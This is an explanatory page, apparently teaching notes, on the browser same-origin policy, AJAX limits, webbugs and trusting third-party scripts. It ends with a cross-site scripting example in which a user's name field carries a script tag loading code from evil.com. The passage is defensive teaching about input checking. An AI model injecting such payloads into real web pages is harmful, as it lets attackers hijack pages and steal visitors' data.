Many operations are not allowed from JavaScript in a client browser. For example,
JavaScript in one window can't look or modify anything in another window that's visiting a different server.
+- window 1 ----------------------------+
| http://marlboro.edu/home.html |
| <script src=/scripts/stuff.js> |
| <script src=http://oz.com/magic.js> |
+---------------------------------------+
This window's server is marlboro.edu.
The JavaScript in both stuff.js and magic.js
can only interact with documents from marlboro.edu.
In particular, neither of these scripts can look
at cookies or alter forms from amazon.com's 'window 2' below.
+- window 2 ----------------------+
| http://amazon.com/home.html |
| |
+---------------------------------+
If, say, magic.js could interact with window 2's document, then it could for example change the amzon window's <form post=URL> to any URL it wanted - then when you went to buy some books, you could be sending your credit card information somewhere else entirely.
Scripts that make HTTP requests for more data (i.e. AJAX) can only access the server that the document is from.
+- window 1 ----------------------------------------+
| http://marlboro.edu/home.html |
| <script src=/scripts/ajax.js> |
| ... can talk to http://marlboro.edu/data.xml |
| <script src=http://oz.com/ajax2.js> |
| ... can *not* talk to http://oz.com/spy.xml |
+---------------------------------------------------+
This document is from marlboro.edu.
Any additional HTTP requests from JavaScript running
in this window can only be directed to marlboro.edu.
Even though the ajax2.js file is from oz.com, it cannot use AJAX techniques to make an HTTP request back to oz.com, because the document is from marlboro.edu - a different origin.
Since HTTP requests not only get information but can also send information, this keeps scripts from spying on you by sending information to sites other than the one that you're explicitly visiting.
This restriction can be circumvented by explicitly changing document.domain, for example if a page at pages.company.com wanted to have its JavaScript fetch data from data.company.com.
Be clear that the restrictions above apply to what the JavaScript program can do, not what tags in the HTML can do.
Image tags, for example, can make an HTTP request from anywhere. This is commonly used for purposes other than just images, such as counters or tracking; such things are often called 'webbugs'.
Likewise, you can put any URL you want in a 'script' tag, which will load and run the JavaScript from that URL ... which may in turn create other 'script' tags in the document which may load other scripts. Those scripts can do whatever they want to your web page - with your implicit permission; you referenced 'em - so make sure that you trust them.
To be secure, you must make sure that anything entered by the user isn't 'leaking out' somewhere unexpected. You do this by checking to see that they input what you want, and only what you want.
For example, if you ask them for their name in a form, and then use javascript to stick it into a webpage, so
user: Jim
turns into
<p>Hi Jim</p>
they might instead type
user: Eve<script src='evil.com/i_own_your_page.js'></script>
which if just stuck into your page would load their JavaScript ... which could do anything it wanted to your page.
For another example, see When Trinity Hacked the IRS D-Base at the Hacker Challenges page at counterhack.net.